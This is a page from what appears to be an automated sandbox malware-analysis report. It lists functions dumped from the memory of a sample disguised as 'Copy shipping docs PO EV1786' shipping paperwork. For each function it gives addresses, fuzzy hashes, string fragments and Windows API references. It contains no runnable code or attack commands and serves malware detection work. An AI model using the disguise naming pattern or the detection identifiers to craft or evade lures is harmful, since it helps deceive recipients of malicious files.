Opcode Fuzzy Hash: 9dc9a58db92b8ba81f5c74e8339abf5eb19f5193a27122553ed3e60361d456d6
Instruction Fuzzy Hash: 87611435B082409FDF655F78945826E3BA2EFC6360F154569E922DB3D2DF388D02CB51

Function 044DB896 Relevance: 4.5, Strings: 3, Instructions: 771
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{T]n^, xrefs: 044DB943, 044DB948
Te]q, xrefs: 044DBE27
Te]q, xrefs: 044DBE00

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: Te]q$Te]q${T]n^
API String ID: 0-719970019
Opcode ID: 13deade935fb94a5085eb589843b48a1e67466ed6eeca8ac08b9360595d754e2
Instruction ID: 3fac4c1e9c1a04c8acd519d57cf9a7e13dd524d847e4bf5c6e7dc91d08f8c0a3
Opcode Fuzzy Hash: 13deade935fb94a5085eb589843b48a1e67466ed6eeca8ac08b9360595d754e2
Instruction Fuzzy Hash: 8082A274A01228CFDB64EF64D994B9DBBB2FB49300F1041E9D809AB365DB35AE85CF50

Function 044DB894 Relevance: 4.5, Strings: 3, Instructions: 768
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{T]n^, xrefs: 044DB943, 044DB948
Te]q, xrefs: 044DBE27
Te]q, xrefs: 044DBE00

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: Te]q$Te]q${T]n^
API String ID: 0-719970019
Opcode ID: fb38d9c32892522328f2db68e7f84b5e371ceef94fd5a5cfebcb53c0ad960cf6
Instruction ID: d962e85d5c92ba8bb8c5e5221c8685a0b154e0987072c835b1e5de673f6e2d50
Opcode Fuzzy Hash: fb38d9c32892522328f2db68e7f84b5e371ceef94fd5a5cfebcb53c0ad960cf6
Instruction Fuzzy Hash: CB82A274A01228CFDB64EF64D994B9DBBB2FB49300F1041E9D809AB365DB35AE85CF50

Function 044DCDBC Relevance: 3.3, Strings: 2, Instructions: 772
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 044DD35D
{T]n^, xrefs: 044DCE69, 044DCE6E, 044DD1F9, 044DD1FE

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: Te]q${T]n^
API String ID: 0-4030163818
Opcode ID: 30664052afa0bed24e7767818376a03c7c2b22acf115edabd2a3d9be84bd615e
Instruction ID: c57bbdc9c10cb6a9d09057d8774f4a47964a28a2eb2f334485b1329d6dde230d
Opcode Fuzzy Hash: 30664052afa0bed24e7767818376a03c7c2b22acf115edabd2a3d9be84bd615e
Instruction Fuzzy Hash: 5582A074A01229CFDB64EF24D994BADBBB2EF49304F1041E9D809AB365DB359E85CF40

Function 044DCDBA Relevance: 3.3, Strings: 2, Instructions: 769COMMON

Download Yara Rule

Strings

Te]q, xrefs: 044DD35D
{T]n^, xrefs: 044DCE69, 044DCE6E, 044DD1F9, 044DD1FE

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: Te]q${T]n^
API String ID: 0-4030163818
Opcode ID: 1de859d0afb2d79f5642ca5d66e529bd43c268a9256612c859518d1e648b399a
Instruction ID: 2083a61baf4c7297f196d5565d6abb7833f9e5e068cd96549a560b42e6ee8ca8
Opcode Fuzzy Hash: 1de859d0afb2d79f5642ca5d66e529bd43c268a9256612c859518d1e648b399a
Instruction Fuzzy Hash: 2282A074A01229CFDB64EF24D994BADBBB2EF49304F1041E9D809AB365DB359E85CF40

Function 0A150FF2 Relevance: 2.8, Strings: 2, Instructions: 343COMMON

Download Yara Rule

Strings

4']q, xrefs: 0A151019
4']q, xrefs: 0A15103F

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: 35ab3ce454b911b4f06983433fcc676b20f426c7a27dc31f6a52d95a5fd3c8d5
Instruction ID: 6a626cf31ace4583d87b8b556be8fe47ce29c7bad5b53efda3f7138658443fc6
Opcode Fuzzy Hash: 35ab3ce454b911b4f06983433fcc676b20f426c7a27dc31f6a52d95a5fd3c8d5
Instruction Fuzzy Hash: DAB1A631750101EFDB6AAA39C86473D379AEF85610F1601BAE922CF3A1DB69CC81CB55

Function 044D59D0 Relevance: 2.8, Strings: 2, Instructions: 292COMMON

Download Yara Rule

Strings

LR]q, xrefs: 044D5B19
LR]q, xrefs: 044D59EC

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: LR]q$LR]q
API String ID: 0-3917262905
Opcode ID: b36b80cad2717c213cf7c31e3ed83a1ea1e04ea84c5293608e36b7ebc6ff9f4e
Instruction ID: ad0ec3f086e70bd96a52a94498dcf2628e148004f21572cb52ad23e1720cbaae
Opcode Fuzzy Hash: b36b80cad2717c213cf7c31e3ed83a1ea1e04ea84c5293608e36b7ebc6ff9f4e
Instruction Fuzzy Hash: B0A19D34B101159FCB18DF78C4A896E7BF6EF89A4471581AAE406DB365EF34EC02CB91

Function 06A9E750 Relevance: 2.7, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

,aq, xrefs: 06A9E826
,aq, xrefs: 06A9E830

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: ,aq$,aq
API String ID: 0-2990736959
Opcode ID: bf01e7baa419e592e2c71b3f857ac03acced35f8219d5df93583e508423b0251
Instruction ID: 7708b5f7b1c38320f7d916aaf225b659e835239194188d1d7a43e0db2e5343bf
Opcode Fuzzy Hash: bf01e7baa419e592e2c71b3f857ac03acced35f8219d5df93583e508423b0251
Instruction Fuzzy Hash: 4C817E34E00105CFDF98EFA9C4849AAF7F2FF89214B258569D406DB366DB31E841CBA1

Function 06A9E1E0 Relevance: 2.7, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

Haq, xrefs: 06A9E30E
Haq, xrefs: 06A9E2DB

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: Haq$Haq
API String ID: 0-4016896955
Opcode ID: 03ab5fa787bceafc134ba2f618c3a81fa7916ce680cbe1a17298ac2730593083
Instruction ID: d77b4247a03af2555477aa63138f4c42fe793bd741e690f838b874ed51aa72aa
Opcode Fuzzy Hash: 03ab5fa787bceafc134ba2f618c3a81fa7916ce680cbe1a17298ac2730593083
Instruction Fuzzy Hash: 5D71DE327042569FDF55DF64D844BAB7BE6FF89300F2484A9E805CB292CB35D841CBA1

Function 0A15B678 Relevance: 2.6, Strings: 2, Instructions: 128COMMON

Download Yara Rule

Strings

8bq, xrefs: 0A15B7D1
TJbq, xrefs: 0A15B80A

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: 8bq$TJbq
API String ID: 0-3440557903
Opcode ID: e127d34801467795a5b19a7d7791bd18e67d704dbc66ea6bb0faa234e57cdd49
Instruction ID: 22eefe4abec1b43aacec61f0096f3d782e0a0ee84285aa53c64bce152feb7dc5
Opcode Fuzzy Hash: e127d34801467795a5b19a7d7791bd18e67d704dbc66ea6bb0faa234e57cdd49
Instruction Fuzzy Hash: 21410235A041098FCB44DFA8C580EDEBBB6FF88320F195154E901AB3A5DB71ED85CBA1

Function 06A9C380 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xaq, xrefs: 06A9C3B6
Xaq, xrefs: 06A9C38D

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: Xaq$Xaq
API String ID: 0-1488805882
Opcode ID: 29faea9be8381b9d389f463144e819fc1e63aabfafae83db6f7bcb0d9607e14f
Instruction ID: 27b9e15aa6374c92df9e1e5c8339c2f2e354f5bccb06c0413f0c1778df576aba
Opcode Fuzzy Hash: 29faea9be8381b9d389f463144e819fc1e63aabfafae83db6f7bcb0d9607e14f
Instruction Fuzzy Hash: 6031F431F40B258BEF986A79899823FF5EAEBC4360F244439D813DB384DB74C84486B1

Function 0A150E60 Relevance: 2.6, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

$]q, xrefs: 0A150F1C
$]q, xrefs: 0A150F3F

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: e8c14170d6e397d5e6d0debab39c30d532d14b015407203b7a269b2fc61ff7cf
Instruction ID: 767db04fce8192a475e6cded7a194cd1c31f7b7a0909899ccc9a415337949bc6
Opcode Fuzzy Hash: e8c14170d6e397d5e6d0debab39c30d532d14b015407203b7a269b2fc61ff7cf
Instruction Fuzzy Hash: 9E318230304101CFDB29DFB9DC9463E7BAAFB89710B25445AE826CF292DB29DC80CB51

Function 0A15B6F9 Relevance: 2.6, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

8bq, xrefs: 0A15B7D1
TJbq, xrefs: 0A15B80A

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: 8bq$TJbq
API String ID: 0-3440557903
Opcode ID: 75d23e917703b831c1e21802ef11957d60dd06bc553cf7abd6bce9af4680278d
Instruction ID: 84e84c2befaaa67f5396d032caf327900c3e0f6bf8b33eb88fb3f35340e510ef
Opcode Fuzzy Hash: 75d23e917703b831c1e21802ef11957d60dd06bc553cf7abd6bce9af4680278d
Instruction Fuzzy Hash: 4A313535B401098FCB48DFA8C580E9EBBB6FF88320F195454E901AB3A5DB70EC85CB91

Function 0A15B72D Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

8bq, xrefs: 0A15B7D1
TJbq, xrefs: 0A15B80A

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: 8bq$TJbq
API String ID: 0-3440557903
Opcode ID: a339ef3d17f1f630f68c02674eb5418b51300489ddcb831c732276b6ebecf7f2
Instruction ID: 457e41c20fd63528a825036ab19ded9563213e011000c0d3f9a163e5211c9119
Opcode Fuzzy Hash: a339ef3d17f1f630f68c02674eb5418b51300489ddcb831c732276b6ebecf7f2
Instruction Fuzzy Hash: A5312235B401198FCB44DFA8C580E9EBBB6EF88320F195454E901AB3A6DB71EC85CB91

Function 06A99348 Relevance: 1.8, Strings: 1, Instructions: 546COMMON

Download Yara Rule

Strings

LR]q, xrefs: 06A995D1

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: aa0b3517adcbadee002af298a708e1018c85aecd25a324aa4db83c823194db6a
Instruction ID: 287ce786c25a3ea581c6bbf7be87feba21bc5e6a2664ea7bf1595830de9a329a
Opcode Fuzzy Hash: aa0b3517adcbadee002af298a708e1018c85aecd25a324aa4db83c823194db6a
Instruction Fuzzy Hash: B152D874E01319CFCB54EF24E985A9DBBB5FB89300F1085A6D409AB36ADB349E85CF50

Function 06A99358 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LR]q, xrefs: 06A995D1

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 4753da68e42d8be4a551701e629632f438d6d3758260128e45b724a890198301
Instruction ID: dc3fb1e8963e4a269bfa4784dda130d26f5f8b1b4759f0334ce3993cb212d6ef
Opcode Fuzzy Hash: 4753da68e42d8be4a551701e629632f438d6d3758260128e45b724a890198301
Instruction Fuzzy Hash: 2352D874E01319CFCB54EF24E985A9DBBB5FB89300F1085A6D409AB36ADB349E85CF50

Function 04B12E90 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B14202

Memory Dump Source

Source File: 00000000.00000002.4536673855.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 81c846eda31d6bcfea21999f109bface6434efc149ac2b7decd11b87d197c12b
Instruction ID: c7384b0648109157ec9038b33f8a853a82d3d30266fc49e70a9bd40abe51b887
Opcode Fuzzy Hash: 81c846eda31d6bcfea21999f109bface6434efc149ac2b7decd11b87d197c12b
Instruction Fuzzy Hash: 4F51B1B1D103199FDB14CF9AC884ADEBBB5FF48310F64816AE819AB210D774A885CF90

Function 04B140E8 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B14202

Memory Dump Source

Source File: 00000000.00000002.4536673855.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0474d4e0138c3c3f04d49b56e9062ae31f70ec6998cf5e83722d4e2a88f3e918
Instruction ID: f8cc57018e78e79f399340254a1c4653ea4145130c813b8f7b8fdfc2ced6ef7a
Opcode Fuzzy Hash: 0474d4e0138c3c3f04d49b56e9062ae31f70ec6998cf5e83722d4e2a88f3e918
Instruction Fuzzy Hash: 5A41BFB1D102099FDB14CF99C884ADEBBB5FF48300F64816AE419AB220D775A885CF90

Function 00CA7D1D Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00CA7DD9

Memory Dump Source

Source File: 00000000.00000002.4530007288.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: cfe6c01510e60bea3343a27d30b4f55808d1c9bbb9c2a2f9aa6843b7842eca2b
Instruction ID: cc33178c371b9745b9dc7c1603b3738bb6a1fb6c0992be90b1eb011d07b9814b
Opcode Fuzzy Hash: cfe6c01510e60bea3343a27d30b4f55808d1c9bbb9c2a2f9aa6843b7842eca2b
Instruction Fuzzy Hash: 0A41F2B0C00619CFDB24CFAAC844BDDBBB1FF49704F20816AD419AB255DB75694ACF90

Function 04B12FE4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04B16781

Memory Dump Source

Source File: 00000000.00000002.4536673855.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: bf7990fe4a42e9789ba14818ef566f8372f91e96e13b02b9f63a03d9ab7df82a
Instruction ID: 68cb52b5674cc6d35cb0ef814ad78338c1592513eb3ed9540bbe20766f48fd48
Opcode Fuzzy Hash: bf7990fe4a42e9789ba14818ef566f8372f91e96e13b02b9f63a03d9ab7df82a
Instruction Fuzzy Hash: BC411AB9A003058FDB14CF99C488BAAFBF5FF89314F24C499D519A7321D334A845CBA1

Function 00CA68E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00CA7DD9

Memory Dump Source

Source File: 00000000.00000002.4530007288.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 18dbb55555edc3824f798ce13ef8fe0a30e437a59e63a0bb043c98aaafd6ec8c
Instruction ID: 3dcdeb78c61b6f23b70a52fe6ebee3247eeb3a9ad28aabeb0a14753fefee89b6
Opcode Fuzzy Hash: 18dbb55555edc3824f798ce13ef8fe0a30e437a59e63a0bb043c98aaafd6ec8c
Instruction Fuzzy Hash: B241EFB0C04619CFDB24CFA9C844B9EBBF5BF49308F20816AD418AB255DB75694ACF90

Function 073D23F0 Relevance: 1.6, APIs: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 073D24BF

Memory Dump Source

Source File: 00000000.00000002.4539560556.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 5989d8048870718c7415baf8e04274b05621bddec5797d48e896b8a5aeb4a6ab
Instruction ID: 8f3cc1b262620b36f034db08bb19dc89c5a1cecec563511ce3193af5aabed648
Opcode Fuzzy Hash: 5989d8048870718c7415baf8e04274b05621bddec5797d48e896b8a5aeb4a6ab
Instruction Fuzzy Hash: 2F31ADB69043599FDB01DFA9D804ADEBFF5EF09310F14809AE918AB261C335D855CFA1

Function 00CAE320 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00CAFE56,?,?,?,?,?), ref: 00CAFF17

Memory Dump Source

Source File: 00000000.00000002.4530007288.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a4f9a4e88bb8a96d8f5eb1de852a79c76434c5f64efa06e3048d8bfca97664b0
Instruction ID: 685df9de8e952714a9840acaba3dd4e923bea844772683e57e9cd19291168ad7
Opcode Fuzzy Hash: a4f9a4e88bb8a96d8f5eb1de852a79c76434c5f64efa06e3048d8bfca97664b0
Instruction Fuzzy Hash: 5221E5B59003099FDB10CFEAD984ADEFBF5EB49314F14802AE918A3350D378A951CFA5

Function 04460BAC Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 04460CEE

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c821419cf7ae06d46f5b2237a4ef7fccaa64fdcc6b63dcad6018d092c2bf63aa
Instruction ID: 818e84c98a1716dde0ade24b70ea847b8744758e3770e56d800d1606f1157639
Opcode Fuzzy Hash: c821419cf7ae06d46f5b2237a4ef7fccaa64fdcc6b63dcad6018d092c2bf63aa
Instruction Fuzzy Hash: 91116D74A011098FDF08DFA8D484AADBBB5FF88304F548516E805A7242D770E981CB61

Function 073D2450 Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 073D24BF

Memory Dump Source

Source File: 00000000.00000002.4539560556.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 7c95869934d2cec0cdf10a1943ddd1f18a9ad61088a4c6e6f241e6e3367ad45c
Instruction ID: e899039e5a62351595fa5dfae6a1682e3ca7b06ea72dc7c208e1c6d2e73aa778
Opcode Fuzzy Hash: 7c95869934d2cec0cdf10a1943ddd1f18a9ad61088a4c6e6f241e6e3367ad45c
Instruction Fuzzy Hash: 441149B68002599FDB10CF9AD844BDEBFF8FF48320F14841AE918A3210C379A950DFA4

Function 00CAD798 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00CAD7FE

Memory Dump Source

Source File: 00000000.00000002.4530007288.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e2c08a3c45e060307fb9811dd836765f4c03a28af5d3e44e42791f39f35188db
Instruction ID: 21b28424065c20fc9254105a6a73a3b433fced4f66f5fc4114dd3d7447913209
Opcode Fuzzy Hash: e2c08a3c45e060307fb9811dd836765f4c03a28af5d3e44e42791f39f35188db
Instruction Fuzzy Hash: 5911F2B5C003498FCB10DF9AC444ADEFBF5EF89714F14842AD42AA7650D379A545CFA1

Function 06A97C10 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

nl~, xrefs: 06A97DD6

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: nl~
API String ID: 0-3755660440
Opcode ID: 877865415c894518d40ee79af9cc10e495fae6c17db6ab36457f596c4cd8e36c
Instruction ID: 7f14e4b1687887e23028c6fc0a8826061675a1f00813332ae95bd70bcf5cdc3f
Opcode Fuzzy Hash: 877865415c894518d40ee79af9cc10e495fae6c17db6ab36457f596c4cd8e36c
Instruction Fuzzy Hash: 7E61C474E04218DFEF54EFA5D9956ADBBBAFF89300F208029D819A7756DB345801CF60

Function 0A15BAC0 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

Haq, xrefs: 0A15BBC5

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: b5fd95c7945362507bafe1e000c0843137dd7ae375f7d2eaff916cc293591a72
Instruction ID: 28f7ff0f59201394c8dde326e482331af8ed76ed1e01290989e8213338367035
Opcode Fuzzy Hash: b5fd95c7945362507bafe1e000c0843137dd7ae375f7d2eaff916cc293591a72
Instruction Fuzzy Hash: C451E135B09244CFCB14DF78D8549AE7FA6EF8A300B1584B9E919CB292DF349D02CB91

Function 06A92C75 Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

`\, xrefs: 06A9293C

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: `\
API String ID: 0-3053625064
Opcode ID: c22165b67a25e83740cab1f34bf77a727aa3cb79c4e43025f9ff6f0a9e1bc003
Instruction ID: 72e98c1c6b728fec9ba602752157d6bfbcdef91d5f2265f167d94513e6dc1eca
Opcode Fuzzy Hash: c22165b67a25e83740cab1f34bf77a727aa3cb79c4e43025f9ff6f0a9e1bc003
Instruction Fuzzy Hash: E6514974A04219DFEB60EFA8D944B9D7BF9FB49300F1095A5D10AAB216DB309E85CF60

Function 06A92CAA Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

`\, xrefs: 06A9293C

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: `\
API String ID: 0-3053625064
Opcode ID: 3ad1fdc90a32f4e044c8f2859f02e70a50c8eb746b5f06e42208326b6bea9c71
Instruction ID: 7849ecd8dd70928f324e794522d3a8fe46160e25cc091bef46900d5167a8a1a5
Opcode Fuzzy Hash: 3ad1fdc90a32f4e044c8f2859f02e70a50c8eb746b5f06e42208326b6bea9c71
Instruction Fuzzy Hash: FE512774D04219DFDB50EFA8D584A9DBBF9FB48300F109965E10AEB25ADB309A45CF60

Function 06A92B85 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

`\, xrefs: 06A9293C

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: `\
API String ID: 0-3053625064
Opcode ID: d6cb3d0742b14afcfab563be3ba54e19573d4203a1fde5904a7da47a2b79f546
Instruction ID: 001c6bf1226afff10e562f5bcc938aed75e1a15e15d9f6cc775f9c6d6b1f9725
Opcode Fuzzy Hash: d6cb3d0742b14afcfab563be3ba54e19573d4203a1fde5904a7da47a2b79f546
Instruction Fuzzy Hash: 30414874D01219DFEB50EFA8D584B9DBBF9FB48300F109565D109AB256DB30AA84CF60

Function 06A97C53 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

nl~, xrefs: 06A97DD6

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: nl~
API String ID: 0-3755660440
